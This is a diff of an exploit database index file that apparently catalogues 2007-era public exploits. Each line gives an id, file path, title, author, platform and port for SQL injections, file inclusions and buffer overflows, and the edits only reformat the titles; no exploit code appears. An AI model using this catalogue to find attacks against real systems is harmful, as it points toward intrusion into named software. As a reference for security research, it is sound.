4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 @@ -3857,7 +3857,7 @@ id,file,description,date,author,platform,type,port 4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX - (actrpt2.dll 2.5) Inscure Method",2007-07-21,shinnai,windows,remote,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - (page.php id) Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 -4211,platforms/php/webapps/4211.htm,"JBlog 1.0 Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 +4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired - (index.php newsID) SQL Injection",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF",2007-07-23,shinnai,windows,remote,0 @@ -3874,7 +3874,7 @@ id,file,description,date,author,platform,type,port 4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP - php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 -4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 +4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - (.mls) Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 @@ -3893,7 +3893,7 @@ id,file,description,date,author,platform,type,port 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0 4246,platforms/php/webapps/4246.txt,"wolioCMS - Auth Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 -4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050 +4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050 4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0 @@ -3906,7 +3906,7 @@ id,file,description,date,author,platform,type,port 4257,platforms/windows/local/4257.c,"Panda Antivirus 2008 - Local Privilege Escalation Exploit",2007-08-05,tarkus,windows,local,0 4258,platforms/php/webapps/4258.txt,"la-nai CMS 1.2.14 - Multiple SQL Injection",2007-08-06,k1tk4t,php,webapps,0 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - (VDT70.DLL NotSafe) Stack Overflow Exploit",2007-08-06,DeltahackingTEAM,windows,remote,0 -4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) Local Buffer Overflow PoC",2007-08-06,NetJackal,multiple,dos,0 +4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow PoC",2007-08-06,NetJackal,multiple,dos,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - (.ply) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - (.spr) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 @@ -3916,7 +3916,7 @@ id,file,description,date,author,platform,type,port 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"frontaccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 -4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 +4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) - Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4272,platforms/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) - Denial of Service",2007-08-09,"Martin Kluge",windows,dos,0 4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 @@ -3932,7 +3932,7 @@ id,file,description,date,author,platform,type,port 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 beta 5 - Remote Buffer Overflow Exploit",2007-08-13,n00b,windows,remote,26000 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - (category.php cat) SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 -4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 +4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 4287,platforms/windows/remote/4287.py,"SurgeMail 38k - (SEARCH) Remote Buffer Overflow Exploit",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"WireShark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 @@ -3940,14 +3940,14 @@ id,file,description,date,author,platform,type,port 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - (search.php query) SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 - (php_win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 -4294,platforms/windows/dos/4294.pl,"Mercury SMTPD Remote Preauth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 +4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Auth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote BoF Exploit",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 -4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 +4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",2007-08-23,shinnai,windows,dos,0 @@ -3961,7 +3961,7 @@ id,file,description,date,author,platform,type,port 4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - (search) Remote Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 -4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 +4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Auth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Auth EIP Overwrite Exploit",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 4318,platforms/windows/dos/4318.php,"PHP 5.2.0 - (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 @@ -3990,8 +3990,8 @@ id,file,description,date,author,platform,type,port 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Remote File Upload / LFI",2007-08-29,GoLd_M,php,webapps,0 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - (id) SQL Injection",2007-08-30,"not sec group",php,webapps,0 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Remote File Upload",2007-08-30,Don,cgi,webapps,0 -4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) pre-auth Remote Overflow PoC",2007-08-30,rgod,windows,dos,0 -4345,platforms/windows/local/4345.c,"Norman Virus Control nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 +4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Auth Remote Overflow PoC",2007-08-30,rgod,windows,dos,0 +4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 4348,platforms/windows/remote/4348.c,"PPStream - (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow Exploit",2007-08-31,dummy,windows,remote,0 @@ -4003,7 +4003,7 @@ id,file,description,date,author,platform,type,port 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (.m3u) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (.m3u) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - (index.php page) Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 -4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 +4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 4359,platforms/multiple/dos/4359.txt,"Apple Quicktime < 7.2 - SMIL Remote Integer Overflow PoC",2007-09-03,"David Vaartjes",multiple,dos,0 4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow Exploit (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 @@ -4037,7 +4037,7 @@ id,file,description,date,author,platform,type,port 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - (CryptoX.dll 2.0) SaveToFile() Inscure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - (CryptoX.dll 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0 -4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 +4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 @@ -4071,19 +4071,19 @@ id,file,description,date,author,platform,type,port 4423,platforms/php/webapps/4423.txt,"modifyform - (modifyform.html) Remote File Inclusion",2007-09-18,mozi,php,webapps,0 4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS - Remote Exploit PoC",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo Blind SQL Injection",2007-09-18,nexen,php,webapps,0 -4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Preauth DoS / BoF PoC",2007-09-18,"Alex Hernandez",hardware,dos,0 +4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Auth DoS / BoF PoC",2007-09-18,"Alex Hernandez",hardware,dos,0 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 -4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit",2007-09-19,void,windows,remote,143 +4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Post-Auth Overflow Exploit",2007-09-19,void,windows,remote,143 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution Exploit",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X isInstalled.dnsResolve Function Overflow PoC",2007-09-19,"YAG KOHHA",multiple,dos,0 4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - (phpbb_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 -4435,platforms/php/webapps/4435.pl,"Flip 3.0 Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 +4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 -4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 -4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit",2007-09-21,axis,windows,remote,25 +4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 +4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow Exploit",2007-09-21,axis,windows,remote,25 4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 4441,platforms/php/webapps/4441.txt,"izicontents rc6 - (RFI/LFI) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 @@ -4113,7 +4113,7 @@ id,file,description,date,author,platform,type,port 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0 -4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 +4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0 4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 @@ -4123,7 +4123,7 @@ id,file,description,date,author,platform,type,port 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps,0 4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 - index.php Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 4477,platforms/php/webapps/4477.txt,"php wcms XT 0.0.7 - Multiple Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 -4478,platforms/linux/remote/4478.c,"smbftpd 0.96 SMBDirList-function Remote Format String Exploit",2007-10-01,"Jerry Illikainen",linux,remote,21 +4478,platforms/linux/remote/4478.c,"smbftpd 0.96 - SMBDirList-function Remote Format String Exploit",2007-10-01,"Jerry Illikainen",linux,remote,21 4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Arbitrary Remote Rewrite DoS",2007-10-01,rgod,windows,dos,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Remote Blind SQL Injection",2007-10-02,k1tk4t,php,webapps,0 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 @@ -4159,7 +4159,7 @@ id,file,description,date,author,platform,type,port 4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 - category.php SQL Injection",2007-10-10,ka0x,php,webapps,0 4512,platforms/php/webapps/4512.txt,"nuseo php enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"Php-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 -4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling Remote BoF Exploit",2007-10-10,bangus/magnum,linux,remote,0 +4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote BoF Exploit",2007-10-10,bangus/magnum,linux,remote,0 4515,platforms/solaris/local/4515.c,"Solaris 10 - x86/sparc sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 4516,platforms/solaris/local/4516.c,"Solaris - fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc)",2007-10-10,qaaz,solaris,local,0 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 @@ -4211,7 +4211,7 @@ id,file,description,date,author,platform,type,port 4563,platforms/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",2007-10-23,BiNgZa,php,webapps,0 4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusion",2007-10-23,Civi,php,webapps,0 -4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (Metasploit)",2007-10-24,ri0t,windows,remote,10616 +4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow Exploit (Metasploit)",2007-10-24,ri0t,windows,remote,10616 4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure Exploit",2007-10-24,kingcope,multiple,remote,0 4568,platforms/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion",2007-10-25,L4teral,php,webapps,0 4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / DoS",2007-10-27,"Nice Name Crew",windows,dos,0 @@ -4219,7 +4219,7 @@ id,file,description,date,author,platform,type,port 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581 -4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 +4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - (include_path) Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion",2007-10-28,mozi,php,webapps,0 @@ -4279,7 +4279,7 @@ id,file,description,date,author,platform,type,port 4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 -4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel Remote Code Injection Exploit",2007-11-18,Liz0ziM,php,webapps,0 +4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel - Remote Code Injection Exploit",2007-11-18,Liz0ziM,php,webapps,0 4636,platforms/php/webapps/4636.txt,"joomla component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - (LFI/SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 @@ -4298,7 +4298,7 @@ id,file,description,date,author,platform,type,port 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php SQL Injection",2007-11-24,ka0x,php,webapps,0 -4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 +4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Remote XSS / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0 @@ -4390,7 +4390,7 @@ id,file,description,date,author,platform,type,port 4743,platforms/php/webapps/4743.pl,"FreeWebshop 2.2.7 - (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - (Goahead WEBSERVER) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC BoF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 -4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0 +4746,platforms/windows/remote/4746.html,"RavWare Software - .MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 4748,platforms/windows/dos/4748.php,"SurgeMail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0 4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - (.m3u) Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 @@ -4446,7 +4446,7 @@ id,file,description,date,author,platform,type,port 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showCode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 4802,platforms/php/webapps/4802.txt,"XCMS 1.82 - Remote Local File Inclusion",2007-12-28,nexen,php,webapps,0 -4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 +4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 4805,platforms/php/webapps/4805.txt,"NoseRub 0.5.2 - Login SQL Injection",2007-12-28,"Felix Groebert",php,webapps,0 4806,platforms/windows/remote/4806.html,"Persits Software XUpload Control - AddFolder() Buffer Overflow Exploit",2007-12-28,Elazar,windows,remote,0 4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - (forum.php) Remote 